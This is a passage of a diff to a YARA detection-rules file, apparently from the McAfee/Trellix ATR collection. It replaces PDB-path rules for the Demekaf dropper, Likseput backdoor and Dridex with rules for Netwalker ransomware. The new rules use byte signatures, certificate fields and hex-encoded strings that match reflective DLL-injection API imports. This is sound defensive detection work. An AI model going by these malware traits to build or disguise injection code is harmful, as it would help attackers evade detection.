-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_dropper_demekaf_pdb.yar#L1-L25"
+		description = "Rule to detect Netwalker ransomware"
+		author = "McAfee ATR Team"
+		id = "6fe75a64-77b8-5cb8-9365-a5336d4d1617"
+		date = "2020-03-30"
+		modified = "2020-11-20"
+		reference = "https://www.ccn-cert.cni.es/comunicacion-eventos/comunicados-ccn-cert/9802-publicado-un-informe-de-codigo-danino-sobre-netwalker.html"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_netwalker.yar#L3-L28"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "fab320fceb38ba2c5398debdc828a413a41672ce9745afc0d348a0e96c5de56e"
-		logic_hash = "89c0c1da1f8997b12a446c93bbde200e62fac9cab2a9a17147b268d435bdc3b6"
+		logic_hash = "11da4b57f8d9ed1fdf053053a51870af2cbf4062cc1340087ee70c3e92a1baf6"
 		score = 75
 		quality = 70
-		tags = "DROPPER, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "dropper"
-		malware_family = "Dropper:W32/Demekaf"
-		actor_type = "Cybercrime"
-		actor_group = "Unknown"
+		malware_type = "ransomware"
+		note = "The rule doesn't detect the samples packed with UPX"
 
 	strings:
-		$pdb = "\\vc\\res\\fake1.19-jpg\\fake\\Release\\fake.pdb"
+		$pattern = { 8B????8B????89??C7????????????EB??8B????52E8????????83????8B????8B??5DC3CCCCCCCCCCCCCCCCCCCCCCCC558B??83????C7????????????83??????74??83??????72??83??????75??8B????E9????????C7????????????8B????33??B9????????F7??83????89????8B????8B????8D????51E8????????83????89????83??????0F84????????C7????????????C7????????????C6??????C6??????C6??????8B????3B????0F84????????8B????2B????39????73??8B????89????EB??8B????2B????89????8B????89????C7????????????8B????03????8B????2B??89????74??83??????7E??83??????7D??C7????????????8B????03????89????8B????518B????03????528B????03????50E8????????83????8B????03????89????83??????75??6A??8D????528B????03????50E8????????83????8B????83????89????8B????03????89????E9????????8B????8B????89??83??????74??8B????52E8????????83????8B????89??C7????????????8B????8B??5DC3CCCCCCCC558B??51B8????????6B????8B????0FB6????B9????????C1????8B????0FB6????C1????0B??BA????????D1??8B????0FB6????C1????0B??B9????????6B????8B????0FB6????C1????0B??B9????????C1????8B????89????B8????????6B????8B????0FB6??????B9????????C1????8B????0FB6??????C1????0B??BA????????D1??8B????0FB6??????C1????0B??B9????????6B????8B????0FB6??????C1????0B??B9????????6B????8B????89????BA????????6B????8B????0FB6??????B8????????C1????8B????0FB6??????C1????0B??B9????????D1??8B????0FB6??????C1????0B??B8????????6B????8B????0FB6??????C1????0B??B8????????6B????8B????89????B9????????6B????8B????0FB6??????BA????????C1????8B????0FB6??????C1????0B??B8????????D1??8B????0FB6??????C1????0B??BA????????6B????8B????0FB6??????C1????0B??BA????????6B????8B????89????81????????????75??8B????83????89????C7????????????EB??C7????????????B9????????6B????8B????0FB6????BA????????C1????8B????0FB6????C1????0B??B8????????D1??8B????0FB6????C1????0B??BA????????6B????8B????0FB6????C1????0B??BA????????C1????8B????89????B9????????6B????8B????0FB6??????BA????????C1????8B????0FB6??????C1????0B??B8????????D1??8B????0FB6??????C1????0B??BA????????6B????8B????0FB6??????C1????0B??BA????????6B????8B????89????B8????????6B????8B????0FB6??????B9????????C1????8B????0FB6??????C1????0B??BA????????D1??8B????0FB6??????C1????0B??B9????????6B????8B????0FB6??????C1????0B??B9????????6B????8B????89????BA????????6B????8B????0FB6??????B8????????C1????8B????0FB6??????C1????0B??B9????????D1??8B????0FB6??????C1????0B??B8????????6B????8B????0FB6??????C1????0B??B8????????6B????8B????89????B9????????6B????8B????0FBE????BA????????C1????8B????0FBE????C1????0B??B8????????D1??8B????0FBE????C1????0B??BA????????6B????8B????0FBE????C1????0B??BA????????6B????8B????89????B8????????6B????8B????0FBE??????B9????????C1????8B????0FBE??????C1????0B??BA????????D1??8B????0FBE??????C1????0B??B9????????6B????8B????0FBE??????C1????0B??B9????????C1????8B????89????B8????????6B????8B????0FBE??????B9????????C1????8B????0FBE??????C1????0B??BA????????D1??8B????0FBE??????C1????0B??B9????????6B????8B????0FBE??????C1????0B??B9????????D1??8B????89????B8????????6B????8B????0FBE??????B9????????C1????8B????0FBE??????C1????0B??BA????????D1??8B????0FBE??????C1????0B??B9????????6B????8B????0FBE??????C1????0B??B9????????6B????8B????89????8B??5DC3CCCCCC558B??B8????????6B????8B????C7????????????B8????????6B????8B????C7????????????B8????????6B????8B????0FB6????B9????????C1????8B????0FB6????C1????0B??BA????????D1??8B????0FB6????C1????0B??B9????????6B????8B????0FB6????C1????0B??B9????????6B????8B????89????BA????????6B????8B????0FB6??????B8????????C1????8B????0FB6??????C1????0B??B9????????D1??8B????0FB6??????C1????0B??B8????????6B????8B????0FB6??????C1????0B??B8????????6B????8B????89????5DC3CCCCCC558B??83????83??????75??E9????????8B????508D????51E8????????83????BA????????6B????8B????8B????83????B8????????6B????8B????89????B9????????6B????8B????83??????75??B9????????6B????8B????8B????83????BA????????6B????8B????89????83??????77??C7????????????EB??8B????83????89????8B????3B????73??8B????03????0FB6??8B????0FB6??????33??8B????03????88??EB??EB??C7????????????EB??8B????83????89????83??????73??8B????03????0FB6??8B????0FB6??????33??8B????03????88??EB??8B????83????89????8B????83????89????8B????83????89????E9????????8B??5DC3CCCCCCCCCCCCCCCC558B??83????C7????????????EB??8B????83????89????83??????7D??8B????8B????8B????8B????89??????EB??C7????????????EB??8B????83????89????83??????0F8E????????B9????????6B????B8????????C1????8B??????03??????BA????????6B????89??????B9????????6B????B8????????6B????8B??????33??????C1????B8????????6B????B8????????6B????8B??????33??????C1????0B??B8????????6B????89??????BA????????C1????B8????????6B????8B??????03??????B8????????C1????89??????B9????????C1????BA????????C1????8B??????33??????C1????B9????????C1????BA????????C1????8B??????33??????C1????0B??BA????????C1????89??????B8????????6B????BA????????C1????8B??????03??????B9????????6B????89??????B8????????6B????BA????????6B????8B??????33??????C1????BA????????6B????BA????????6B????8B??????33??????C1????0B??BA????????6B????89??????B9????????C1????BA????????6B????8B??????03??????BA????????C1????89??????B8????????C1????B9????????C1????8B??????33??????C1????B8????????C1????B9????????C1????8B??????33??????C1????0B??B9????????C1????89??????BA????????C1????B8????????6B????8B??????03??????B8????????C1????89??????B9????????6B????B8????????C1????8B??????33??????C1????BA????????6B????BA????????C1????8B??????33??????C1????0B??BA????????6B????89??????B9????????6B????B8????????6B????8B??????03??????B8????????6B????89??????BA????????6B????B9????????6B????8B??????33??????C1????B9????????6B????B9????????6B????8B??????33??????C1????0B??B9????????6B????89??????B8????????C1????B9????????6B????8B??????03??????B9????????C1????89??????BA????????6B????B9????????C1????8B??????33??????C1????B8????????6B????B8????????C1????8B??????33??????C1????0B??B8????????6B????89??????BA????????6B????B9????????6B????8B??????03??????B9????????6B????89??????B8????????6B????BA????????6B????8B??????33??????C1????BA????????6B????BA????????6B????8B??????33??????C1????0B??BA????????6B????89??????B9????????D1??BA????????6B????8B??????03??????BA????????D1??89??????B8????????6B????BA????????D1??8B??????33??????C1????B9????????6B????B9????????D1??8B??????33??????C1????0B??B9????????6B????89??????B8????????6B????BA????????6B????8B??????03??????BA????????6B????89??????B9????????6B????B8????????6B????8B??????33??????C1????B8????????6B????B8????????6B????8B??????33??????C1????0B??B8????????6B????89??????BA????????D1??B8????????6B????8B??????03??????B8????????D1??89??????B9????????6B????B8????????D1??8B??????33??????C1????BA????????6B????BA????????D1??8B??????33??????C1????0B??BA????????6B????89??????B9????????6B????B8????????6B????8B??????03??????B8????????6B????89??????BA????????6B????B9????????6B????8B??????33??????C1????B9????????6B????B9????????6B????8B??????33??????C1????0B??B9????????6B????89??????B8????????6B????BA????????6B????8B??????03??????BA????????6B????89??????B9????????6B????B8????????6B????8B??????33??????C1????B8????????6B????B8????????6B????8B??????33??????C1????0B??B8????????6B????89??????BA????????6B???? }
+		$pattern2 = { CCCCCCCCCCA1????????C3CCCCCCCCCCCCCCCCCCCC538B??????5533??5785??74??8B??????85??74??8B????85??74??C1????50E8????????83????89??85??74??8B????5633??85??74??5653E8????????83????85??74??8B????85??74??8D??????89??????5150E8????????83????85??74??8B????8B??8B??????89????FF????8B????463B??72??39????B9????????5E0F44??5F8B??5D5BC35F5D33??5BC3CCCCCCCCCCCCCCCCCCCCCCCCCCCC535556578B??????85??74??83????74??8B????85??74??8B??????85??74??33??85??74??8B??????660F1F??????85??74??8B??53FF????E8????????EB??E8????????8D????8B??FF????8B??53FF??83????85??75??463B????72??5F5E5D33??5BC35F5E5DB8????????5BC3CCCCCCCCCCCCCCCCCCCCCCCCCCCCCC6A??FF??????FF??????E8????????83????C3CCCCCCCCCCCCCCCCCCCCCCCCCC6A??FF??????FF??????E8????????83????C3CCCCCCCCCCCCCCCCCCCCCCCCCC83????????????5674??8B??????85??74??56E8????????8B????50E8????????83????85??75??A1????????6A??83????5650E8????????83????85??75??56E8????????83????85??74??8D????66??????74??83????83????75??33??5EC383????74??A1????????6A??83????5150E8????????83????85??74??B8????????5EC3CCCCCCCCCCCCCCCCCCCC83????????????74??8B??????85??74??A1????????6A??83????5150E8????????83????85??74??B8????????C333??C3CCCCCCCCCCCCCCCCCCCCCCCCCCCC83????????????5674??A1????????83??????74??8B??????85??74??56E8????????8B??????????83????83????75??83??????74??66????????75??0FB7??83????72??83????76??83????66??????76??6A??8D????5650E8????????83????85??74??B8????????5EC333??5EC3CCCCCCCCCCCCCCCCCCCCCCCCCCCC83????????????74??A1????????83????????????74??8B??????85??74??6A??05????????5150E8????????83????85??74??B8????????C333??C3CCCCCC83????????????74??A1????????83????????????74??8B??????85??74??6A??05????????5150E8????????83????85??74??B8????????C333??C3CCCCCC83????????????74??8B??????85??74??A1????????83??????74??6A??83????5150E8????????83????85??74??B8????????C333??C3CCCCCCCCCCCCCCCC83????????????74??8B??????85??74??A1????????83??????74??6A??83????5150E8????????83????85??74??B8????????C333??C3CCCCCCCCCCCCCCCC83????????????5674??8B??????85??74??A1????????83??????74??51E8????????8B??83????85??74??8B??????????6A??83????5651E8????????83????85??74??B8????????5EC356E8????????83????33??5EC3CCCCCCCCCCCCCC535556576A??E8????????8B??83????85??0F84????????8B??660F1F??????0FB7????83????51E8????????8B??83????85??74??0FB7????51FF????57E8????????83????83????????????74??A1????????83??????74??6A??83????5750E8????????83????85??74??E8????????8B????3B????74??6A??51E8????????8B??83????85??74??E8????????6A??538B????FF??E8????????538B??????????FF??57E8????????83????8B??03??85??0F85????????55E8????????83????E8????????6A??8B??????????FF??E9????????CCCCCCCCCCCCCC83????5533??565739??????????0F84????????8B??????85??0F84????????8B??????85??0F84????????53E8????????8B??????????FF??83??????8B??74??E8????????FF????8B??????????FF??89??????E8????????8D??????516A??8B??????????8D??????516A??57FF??85??74??8B??????89????83????74??E8????????8B??????????FF??2B??3D????????77??83??????75??5B5F5E8B??5D83????C3BD????????5B5F5E8B??5D83????C35F5E33??5D83????C383????558B??????85??0F84????????5333??5733??89??????89??????E8????????8D??????518D??????8B??????????5157576A??FF????FF??85??0F85????????E8????????8B??????????FF??3D????????0F85????????FF??????E8????????83????89??????85??0F84????????56E8????????8D??????518D??????8B??????????51FF??????FF??????6A??FF????FF??85??74??33??39??????76??8B??????0F1F??????????E8????????8B??????68????????FF????8B??????????FF??FF??89??????8D????????????5053E8????????8B??83????85??74??FF??????68????????E8????????83????89????474683????3B??????72??8B??????FF??????E8????????83????85??74??85??74??E8????????6A??6A??538B??????????57FF??33??85??74??E8????????FF????8B??????????FF??463B??72??53E8????????83????5EE8????????8D??????516A??FF????8B??????????FF??5F5B85??74??8D??????50FF????E8????????83????E8????????FF????8B??????????FF??55E8????????83????33??5D83????C2????CCCCCCCCCCCCCCCCCCCCCCCC83????568B??????85??74??E8????????8D??????516A??8B??????????56FF??85??74??8D??????5056E8????????83????E8????????568B??????????FF??33??5E83????C2????CCCCCCCCCCCC83????83????????????5356570F84????????A1????????83??????0F84????????55E8????????68????????6A??6A??8B??????????FF??8B??89??????85??0F84????????660F1F????????????C7??????????????C7??????????????C7??????????????E8????????8D??????518D??????8B??????????518D??????516A??6A??6A??6A??55FF??85??0F85????????E8????????8B??????????FF??3D????????0F85????????FF??????E8????????83????89??????85??0F84????????E8????????8B??????8D??????518D??????8B??????????518D??????51FF??????566A??6A??55FF??85??0F84????????33??33??89??????39??????0F86????????0F1F??????????FF??E8????????83????85??75??FF????E8????????83????85??74??E8????????68????????FF??8B??????????55FF??89??????85??74??6A??E8????????8B??83????85??74??8B??????8D????????????5189????8B??????5389????E8????????8B??83????85??74??5568????????E8????????83????89????478B??????8B??????83????4089??????3B??????0F82????????85??74??85??74??E8????????6A??6A??538B??????????57FF??33??85??74??0F1F????E8????????FF????8B??????????FF??463B??72??53E8????????83????FF??????E8????????83????E8????????68????????8B??????????FF??E9????????5D5F5E33??5B83????C2????CCCCCC83????53558B??????565785??0F84????????8B????8D??????516A??55C7??????????????FF????85??0F88????????8B??????8D??????C7??????????????52508B??FF????85??0F88????????6A??8D??????6A??50E8????????33??83????B8????????66????????39??????0F8E????????8B??????8D??????5083????C7??????????????438B??89??????0F10??????8B??510F11??FF????85??0F88????????8B??????8D??????C7??????????????52508B??FF????85??0F88????????8B??????8D??????C7??????????????33??52508B??FF????83????????0F84????????FF??????E8????????83????85??0F85????????8B??????8D??????89??????52508B??FF????85??0F88????????8B??????8D??????89??????52508B??FF????85??0F88????????8B??????8D??????89??????52508B??FF????85??0F88????????33?? }
+		$pattern3 = { CCCCCCCCCC558B??FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF?????????? }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 150KB and any of them
+		uint16( 0 ) == 0x5a4d and any of ( $pattern* )
 }
-rule TRELLIX_ARC_Malw_Likseput_Backdoor_Pdb : BACKDOOR FILE
+
+rule TRELLIX_ARC_Netwalker_Signed : FILE
 {
 	meta:
-		description = "Rule to detect Likseput backdoor based on the PDB"
+		description = "Rule to detect Netwalker ransomware digitally signed."
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "2193daf8-016b-5f49-97ec-b821c8da22f6"
-		date = "2011-03-26"
-		modified = "2020-08-14"
-		reference = "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/bkdr_likseput.e"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_likseput_backdoor_pdb.yar#L1-L25"
+		id = "6806b917-2e02-57e3-887a-b4c12db83653"
+		date = "2020-03-30"
+		modified = "2020-11-20"
+		reference = "https://www.ccn-cert.cni.es/comunicacion-eventos/comunicados-ccn-cert/9802-publicado-un-informe-de-codigo-danino-sobre-netwalker.html"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_netwalker.yar#L30-L47"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "993b36370854587f4eef3366562f01ab87bc4f7b88a21f07b44bd5051340386d"
-		logic_hash = "2afc4b7e6a5f0d9fed9a075aebaac8157e843c83c55c3f2255431bb6a03459ec"
+		logic_hash = "d78ed22771d7c93516375afb8fd2fd7baa40a357ec3c247939a10d11f80ae226"
 		score = 75
 		quality = 70
-		tags = "BACKDOOR, FILE"
+		tags = "FILE"
+		note = "The rule will hit also some Dridex samples digitally signed"
+
+	condition:
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "/CN=EWBTCAXQKUMDTHCXCZ" and pe.signatures [ i ] . serial == "17:16:bb:93:fb:a9:a2:41:ba:a8:2e:c7:5e:ff:0c" or pe.signatures [ i ] . thumbprint == "a4:28:e9:4a:61:3a:1f:cf:ff:08:bf:e7:61:51:64:31:1a:6f:87:bc" )
+}
+rule TRELLIX_ARC_Netwalker : RANSOMWARE FILE
+{
+	meta:
+		description = "Rule based on code overlap in RagnarLocker ransomware"
+		author = "McAfee ATR team"
+		id = "80097a40-534a-5e1b-8fde-e4d832d76698"
+		date = "2020-06-14"
+		modified = "2020-11-20"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_netwalker.yar#L49-L75"
+		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
+		logic_hash = "8c56ebed9e097d294045de46942c708da9ba7e01475dcecb0c3d41fcc8004780"
+		score = 75
+		quality = 70
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Likseput"
-		actor_type = "Cybercrime"
+		malware_type = "ransomware"
 		actor_group = "Unknown"
 
 	strings:
-		$pdb = "\\work\\code\\2008-7-8muma\\mywork\\winInet_winApplication2009-8-7\\mywork\\aaaaaaa\\Release\\aaaaaaa.pdb"
+		$0 = {C88BF28B4330F76F3803C88B434813F2F76F2003C88B433813F2F76F3003C88B434013F2F76F2803C88B432813F2F76F4003C8894D6813F289756C8B4338F76F388BC88BF28B4328F76F4803C88B434813F2F76F2803C88B433013F2F76F400FA4CE}
+		$1 = {89542414895424108BEA8BDA8BFA423C22747C3C5C75588A023C5C744F3C2F744B3C2274473C6275078D5702B008EB3F3C6675078D5302B00CEB343C6E75078D5502B00AEB293C72750B8B542410B00D83C202EB1A3C74750B8B542414B00983C2}
+		$2 = {C8894D7013F28975748B4338F76F408BC88BF28B4340F76F3803C88B433013F2F76F4803C88B434813F2F76F3003C8894D7813F289757C8B4348F76F388BC88BF28B4338F76F4803C88B434013F2F76F400FA4CE}
+		$3 = {C07439473C2F75E380FB2A74DEEB2D8D4ABF8D422080F9190FB6D80FB6C28AD60F47D88AC6042080EA410FB6C880FA190FB6C60F47C83ACB754B46478A1684D2}
+		$4 = {8B433013F2F76F0803C88B432013F2F76F1803C88B0313F2F76F3803C88B430813F2F76F3003C88B433813F2F72F03C8894D3813F289753C8B4338F76F088BC8}
+		$5 = {F73101320E32213234329832E3320C332D334733643383339133A833BD33053463347C34543564358335AE36C3362937E9379A39BA390A3A203A443A183B2B3B}
+		$6 = {8B431813F2F76F4803C88B432813F2F76F3803C88B434013F2F76F200FA4CE0103C903C88B432013F2F76F4003C88B433013F2F76F3003C8894D6013F2897564}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 40KB and any of them
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and all of them
 }
-rule TRELLIX_ARC_Dridex_P2P_Pdb : BACKDOOR FILE
+rule TRELLIX_ARC_Win_Netwalker_Reflective_Dll_Injection_Decoded : RANSOMWARE
 {
 	meta:
-		description = "Rule to detect Dridex P2P based on the PDB"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "57350c96-877e-57de-9465-df9f7eb6d656"
-		date = "2014-11-29"
-		modified = "2020-08-14"
-		reference = "https://www.us-cert.gov/ncas/alerts/aa19-339a"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_dridex_p2p_pdb.yar#L1-L25"
+		description = "Rule to detect Reflective DLL Injection Powershell Script dropping Netwalker, after hexadecimal decoded and xor decrypted "
+		author = "McAfee ATR Team"
+		id = "9562c0b9-e7ac-5b96-99cc-1df91cb617af"
+		date = "2020-05-28"
+		modified = "2020-11-20"
+		reference = "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/ | https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_netwalker.yar#L77-L140"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "5345a9405212f3b8ef565d5d793e407ae8db964865a85c97e096295ba3f39a78"
-		logic_hash = "c9c4db48435203cdb882eef8082efd8424bd13f1aa512cfb3082f365b9bc6e83"
+		hash = "fd29001b8b635e6c51270788bab7af0bb5adba6917c278b93161cfc2bc7bd6ae"
+		logic_hash = "e99c045f39e7933e877a4df7793aa5ea6be5a782bb079419501929ba99844dec"
 		score = 75
-		quality = 70
-		tags = "BACKDOOR, FILE"
+		quality = 30
+		tags = "RANSOMWARE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Dridex"
-		actor_type = "Cybercrime"
-		actor_group = "Unknown"
+		malware_type = "ransomware"
 
 	strings:
-		$pdb = "\\c0da\\j.pdb"
+		$api0 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 20 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 56 69 72 74 75 61 6c 41 6c 6c 6f 63 22 29 5d }
+		$api1 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 47 65 74 50 72 6f 63 41 64 64 72 65 73 73 22 29 5d }
+		$api2 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 4c 6f 61 64 4c 69 62 72 61 72 79 41 22 29 5d }
+		$api3 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 57 72 69 74 65 50 72 6f 63 65 73 73 4d 65 6d 6f 72 79 22 29 5d }
+		$api4 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 56 69 72 74 75 61 6c 46 72 65 65 22 29 5d }
+		$api5 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 47 65 74 43 75 72 72 65 6e 74 50 72 6f 63 65 73 73 22 29 5d }
